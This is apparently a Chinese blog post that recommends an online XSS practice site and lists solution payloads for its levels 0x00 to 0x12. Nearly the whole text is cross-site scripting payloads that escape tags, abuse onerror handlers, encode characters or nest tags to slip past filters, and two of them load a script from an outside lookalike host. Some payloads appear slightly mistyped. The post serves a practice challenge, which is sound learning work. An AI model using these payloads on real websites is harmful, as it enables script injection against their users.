推荐一个XSS在线练习小网站,一共13关。 https://xss.haozi.me
以下是题解
0x00

<script>alert(1);</script>

0x01

</textarea><script>alert(1);</script>

0x02

"><script>alert(1);</script>

0x03

<script>alert1;</script>

0x04

<img src="" onerror=alert&#x28;&#x31;&#x29;>

0x05

--!><script>alert(1)</script>

0x06
type="image" src="" onerror
=alert(1)
0x07

<img src="" onerror=alert(1) 注意末尾有空格

0x08

</style ><script>alert(1);</script>

0x09

https://www.segmentfault.com/"></script><img src="" οnerrοr=alert(1)<"

0x0A

https://www.segmentfault.com@https://www.segmentfault.com.haozi.me/j.js

0x0B

<img src="" onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>

0x0C

<sscriptcript src=https://www.segmentfault.com.haozi.me/j.js></sscriptcript>

0x0D

注意:第一行换行


alert(1);
-->
0x0E

<ſcript src="" onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)></script>

0x0F

'); alert(1); //

0x10

'';alert(1);

0x11

"); alert("1

0x12

</script> <script>alert(1)</script><script>